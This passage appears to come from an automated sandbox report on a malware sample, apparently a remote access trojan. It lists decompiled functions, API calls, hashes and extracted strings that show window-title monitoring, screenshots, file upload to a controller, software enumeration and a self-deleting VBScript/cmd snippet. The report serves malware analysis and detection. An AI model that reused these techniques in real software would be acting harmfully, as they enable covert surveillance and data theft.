                        • String ID: ?
                        • API String ID: 3941738427-1684325040
                        • Opcode ID: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                        • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                        • Opcode Fuzzy Hash: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                        • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                        Function 0044E21E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$EnvironmentVariable$_wcschr
                        • String ID:
                        • API String ID: 3899193279-0
                        • Opcode ID: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                        • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                        • Opcode Fuzzy Hash: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                        • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                        Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                          • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                        • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                        • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                        • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                        • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                        • Sleep.KERNEL32(00000064), ref: 00412060
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                        • String ID: /stext "$HDG$HDG$>G$>G
                        • API String ID: 1223786279-3931108886
                        • Opcode ID: 94246fb79c68cfcb53b25fd957ccf7951aa449ee5690919d5197481e681c450f
                        • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                        • Opcode Fuzzy Hash: 94246fb79c68cfcb53b25fd957ccf7951aa449ee5690919d5197481e681c450f
                        • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A
                        Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                        • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                        • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                        • LoadLibraryA.KERNEL32(?), ref: 00413F27
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                        • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                        • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                        • API String ID: 2490988753-744132762
                        • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                        • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                        • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                        • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                        Function 0041B834 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
                        • RegCloseKey.ADVAPI32(?), ref: 0041BB64
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEnumOpen
                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                        • API String ID: 1332880857-3714951968
                        • Opcode ID: 169ec82b56f5cfc94b0c0b7d9a60f187521d2f64dce5fc83bd669811bb3caad3
                        • Instruction ID: efd277ba010ae8e34e1206f32af9d70b7e49420e91acd4d446967662cfc0484b
                        • Opcode Fuzzy Hash: 169ec82b56f5cfc94b0c0b7d9a60f187521d2f64dce5fc83bd669811bb3caad3
                        • Instruction Fuzzy Hash: 67813E311082449BD324EB21DC51AEFB7E9FFD4314F10493FB586921E1EF34AA49CA9A
                        Function 0040A3F4 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 158sleepCOMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0040A456
                        • Sleep.KERNEL32(000001F4), ref: 0040A461
                        • GetForegroundWindow.USER32 ref: 0040A467
                        • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                        • Sleep.KERNEL32(000003E8), ref: 0040A574
                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                        • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                        • API String ID: 911427763-1497357211
                        • Opcode ID: 08c6775225c1be704445fd44d44109dcec563c1a9d4bfb3f89d30f3a95787bd0
                        • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                        • Opcode Fuzzy Hash: 08c6775225c1be704445fd44d44109dcec563c1a9d4bfb3f89d30f3a95787bd0
                        • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
                        Function 0041CAAE Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                        Download Yara Rule
                        APIs
                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                        • GetCursorPos.USER32(?), ref: 0041CB08
                        • SetForegroundWindow.USER32(?), ref: 0041CB11
                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                        • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                        • ExitProcess.KERNEL32 ref: 0041CB84
                        • CreatePopupMenu.USER32 ref: 0041CB8A
                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                        • String ID: Close
                        • API String ID: 1657328048-3535843008
                        • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                        • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                        • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                        • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                        Function 00444F4D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$Info
                        • String ID:
                        • API String ID: 2509303402-0
                        • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                        • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                        • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                        • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                        Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                        • __aulldiv.LIBCMT ref: 00407FE9
                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                        • CloseHandle.KERNEL32(00000000), ref: 00408200
                        • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                        • CloseHandle.KERNEL32(00000000), ref: 00408256
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                        • API String ID: 1884690901-3066803209
                        • Opcode ID: 142f1f72e0f29cad2ac4c499a5babf56d922c15ed98ea3bc8be458cd3ff9b4fd
                        • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                        • Opcode Fuzzy Hash: 142f1f72e0f29cad2ac4c499a5babf56d922c15ed98ea3bc8be458cd3ff9b4fd
                        • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                        Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00001388), ref: 00409E62
                          • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                          • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                          • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                          • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                        • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                        • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                        • API String ID: 3795512280-3163867910
                        • Opcode ID: cb598f5ef60ca0eca7745399a51d84c8660353be19ff15f145444b1f1551c77f
                        • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                        • Opcode Fuzzy Hash: cb598f5ef60ca0eca7745399a51d84c8660353be19ff15f145444b1f1551c77f
                        • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                        Function 0045007D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___free_lconv_mon.LIBCMT ref: 004500C1
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                        • _free.LIBCMT ref: 004500B6
                          • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                        • _free.LIBCMT ref: 004500D8
                        • _free.LIBCMT ref: 004500ED
                        • _free.LIBCMT ref: 004500F8
                        • _free.LIBCMT ref: 0045011A
                        • _free.LIBCMT ref: 0045012D
                        • _free.LIBCMT ref: 0045013B
                        • _free.LIBCMT ref: 00450146
                        • _free.LIBCMT ref: 0045017E
                        • _free.LIBCMT ref: 00450185
                        • _free.LIBCMT ref: 004501A2
                        • _free.LIBCMT ref: 004501BA
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                        • String ID:
                        • API String ID: 161543041-0
                        • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                        • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                        • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                        • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                        Function 00419138 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                        Download Yara Rule
                        APIs
                        • __EH_prolog.LIBCMT ref: 0041913D
                        • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                        • Sleep.KERNEL32(000003E8), ref: 0041927D
                        • GetLocalTime.KERNEL32(?), ref: 0041928C
                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                        • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                        • API String ID: 489098229-65789007
                        • Opcode ID: 20ad9dcad6b4c7da979322c167eeb5490f5651d63a6c5e78ab6e583428f79961
                        • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                        • Opcode Fuzzy Hash: 20ad9dcad6b4c7da979322c167eeb5490f5651d63a6c5e78ab6e583428f79961
                        • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                        Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                          • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                          • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                          • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                        • ExitProcess.KERNEL32 ref: 0040C832
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                        • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                        • API String ID: 1913171305-390638927
                        • Opcode ID: 71ed8149d107c801a58795291cbbf560ec2e2514c0515b8670bbce909e4cd16b
                        • Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
                        • Opcode Fuzzy Hash: 71ed8149d107c801a58795291cbbf560ec2e2514c0515b8670bbce909e4cd16b
                        • Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                        Function 0044F3F1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                        • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                        • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                        • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                        Function 00454992 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                        • GetLastError.KERNEL32 ref: 00454AA6
                        • __dosmaperr.LIBCMT ref: 00454AAD
                        • GetFileType.KERNEL32(00000000), ref: 00454AB9
                        • GetLastError.KERNEL32 ref: 00454AC3
                        • __dosmaperr.LIBCMT ref: 00454ACC
                        • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                        • CloseHandle.KERNEL32(?), ref: 00454C36
                        • GetLastError.KERNEL32 ref: 00454C68
                        • __dosmaperr.LIBCMT ref: 00454C6F
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                        • String ID: H
                        • API String ID: 4237864984-2852464175
                        • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                        • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                        • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                        • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                        Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 65535$udp
                        • API String ID: 0-1267037602
                        • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                        • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                        • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                        • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
                        Function 00439371 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                        • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                        • __dosmaperr.LIBCMT ref: 004393DD
                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                        • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                        • __dosmaperr.LIBCMT ref: 0043941A
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                        • __dosmaperr.LIBCMT ref: 0043946E
                        • _free.LIBCMT ref: 0043947A
                        • _free.LIBCMT ref: 00439481
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                        • String ID:
                        • API String ID: 2441525078-0
                        • Opcode ID: 49a4e998ced2e249282c630ffc9b744f5a4c3aafdaefe9346f23a023119a2075
                        • Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
                        • Opcode Fuzzy Hash: 49a4e998ced2e249282c630ffc9b744f5a4c3aafdaefe9346f23a023119a2075
                        • Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9
                        Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • SetEvent.KERNEL32(?,?), ref: 00404E71
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                        • TranslateMessage.USER32(?), ref: 00404F30
                        • DispatchMessageA.USER32(?), ref: 00404F3B
                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                        • String ID: CloseChat$DisplayMessage$GetMessage
                        • API String ID: 2956720200-749203953
                        • Opcode ID: 873e6be46378f032ea069c5995f77c0816049facf75ee970e0dab14d7faad135
                        • Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
                        • Opcode Fuzzy Hash: 873e6be46378f032ea069c5995f77c0816049facf75ee970e0dab14d7faad135
                        • Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A
                        Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                        • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                        • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                        • String ID: <$@$@FG$@FG$Temp
                        • API String ID: 1107811701-2245803885
                        • Opcode ID: 7554bfeb40c4b2af2b7365563deb2cc3d5ba60fa6237755d2b448c11faa41bd7
                        • Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
                        • Opcode Fuzzy Hash: 7554bfeb40c4b2af2b7365563deb2cc3d5ba60fa6237755d2b448c11faa41bd7
